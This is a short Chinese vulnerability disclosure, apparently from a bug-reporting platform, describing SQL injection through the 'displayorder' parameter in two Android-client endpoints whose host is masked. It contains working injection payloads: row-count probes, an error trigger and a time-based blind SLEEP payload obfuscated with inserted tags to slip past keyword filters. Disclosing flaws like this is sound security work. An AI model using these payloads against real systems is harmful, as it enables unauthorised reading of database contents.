手机客户端2处接口存在SQL注入,SELECT注入无关键字过滤,理论上可以获取任意数据。
0x01: http://**.**.**.**/android/jobs.php
=========================================================
对应代码:
displayorder参数过滤不正确导致SQL注入。
"displayorder":"rtime> limit 1 #desc"返回一行数据:
![1.png](../upload/201504/232223248c9506b0e6a8b0d6d574f6d5ad375789.png)
"displayorder":"rtime> limit 2 #desc"返回两行数据:
![2.png](../upload/201504/23222335ec6580b9556fd172674cacacff01f14f.png)
SQLMAP跑一跑:
0x02: http://**.**.**.**/android/news-list.php
=========================================================
displayorder参数过滤不正确导致SQL注入。
"displayorder":"id> limit 1 #desc"返回一行数据:
![3.png](../upload/201504/23223417c0b2e94f52248c6e70e13d6a8c5aadb7.png)
"displayorder": "id> abc#desc"返回数据库错误:
![4.png](../upload/201504/232237211e2c2ce1fb3d42d07dbb95b49ba68caf.png)
"displayorder": "id> A<A>ND (SE<A>LECT * F<A>ROM (S<A>ELECT(S<A>LEEP(5)))MqQf)#desc"延时5秒返回数据:
![5.png](../upload/201504/23224722ac2d1a2bab8aa8b2e2cb607985410960.png)
SQLMAP: